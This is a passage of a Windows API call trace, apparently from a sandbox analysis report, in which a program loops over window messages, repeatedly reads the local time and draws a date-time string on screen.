(in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.621] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.621] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.622] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x16b)) [0111.622] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x16b)) [0111.622] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.636] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.636] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.636] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x179)) [0111.636] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x179)) [0111.636] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.660] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.660] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.660] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x191)) [0111.660] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x191)) [0111.660] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.673] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.673] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.673] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x19e)) [0111.673] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x19e)) [0111.673] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.684] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.684] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.684] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x1a9)) [0111.684] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x1a9)) [0111.684] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.705] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.705] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.705] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x1be)) [0111.705] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x1be)) [0111.705] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.716] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.716] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.716] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x1c9)) [0111.716] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x1c9)) [0111.716] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.733] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.733] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.733] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x1da)) [0111.733] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x1da)) [0111.733] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.747] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.747] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.747] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x1e8)) [0111.747] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x1e8)) [0111.747] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.770] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.770] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.770] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x1ff)) [0111.770] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x1ff)) [0111.770] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.781] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.781] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.781] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x20a)) [0111.781] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x20a)) [0111.781] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.798] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.798] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.798] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x21b)) [0111.798] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x21b)) [0111.798] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.814] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.814] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.814] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x22b)) [0111.814] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x22b)) [0111.814] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.824] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.824] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.824] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x235)) [0111.824] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x235)) [0111.824] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.839] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.839] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.839] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x244)) [0111.839] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x244)) [0111.839] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.912] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.912] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.912] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x28d)) [0111.912] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x28d)) [0111.912] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.922] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.922] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.922] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x297)) [0111.922] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x297)) [0111.922] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.932] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.932] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.932] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x2a1)) [0111.932] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x2a1)) [0111.932] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.954] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.954] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.954] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x2b7)) [0111.954] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x2b7)) [0111.954] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.964] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.964] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.964] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x2c1)) [0111.964] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x2c1)) [0111.964] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.984] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.984] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.984] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x2d5)) [0111.984] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x2d5)) [0111.984] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.115] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.115] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.115] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x358)) [0112.115] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x358)) [0112.115] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.120] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.120] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.120] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x35d)) [0112.120] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x35d)) [0112.120] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.136] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.136] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.136] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x36d)) [0112.136] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x36d)) [0112.136] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.163] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.163] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.163] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x388)) [0112.163] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x388)) [0112.163] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.170] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.170] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.170] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x38f)) [0112.171] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x390)) [0112.171] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.190] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.190] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.190] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x3a3)) [0112.190] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x3a3)) [0112.190] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.201] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.201] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.201] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x3ae)) [0112.201] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x3ae)) [0112.201] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.223] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.223] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.224] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x3c5)) [0112.224] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x3c5)) [0112.224] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.257] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.257] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.257] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x3e6)) [0112.258] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x29, wMilliseconds=0x3e7)) [0112.258] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.264] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.264] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.264] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x5)) [0112.264] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x5)) [0112.264] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0112.264] GetDC (hWnd=0x0) returned 0xa0100d0 [0112.265] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0112.265] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0112.265] GetSysColor (nIndex=8) returned 0x0 [0112.265] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0112.265] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0112.265] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0112.265] UnrealizeObject (h=0x2d10099f) returned 1 [0112.265] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0112.265] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0112.265] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0112.265] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:49:42 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:49:42 PM", lprc=0x19f5bd) returned 13 [0112.266] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0112.266] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0112.266] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0112.266] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0112.266] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0112.267] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.286] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.286] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.286] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x1b)) [0112.286] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x1b)) [0112.286] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.297] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.297] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.297] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x26)) [0112.297] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x26)) [0112.297] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.308] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.308] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.308] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x31)) [0112.308] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, wMilliseconds=0x31)) [0112.308] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0112.329] TranslateMessage (lpMsg=0x2347a14) returned 0 [0112.329] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0112.329] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x2a, 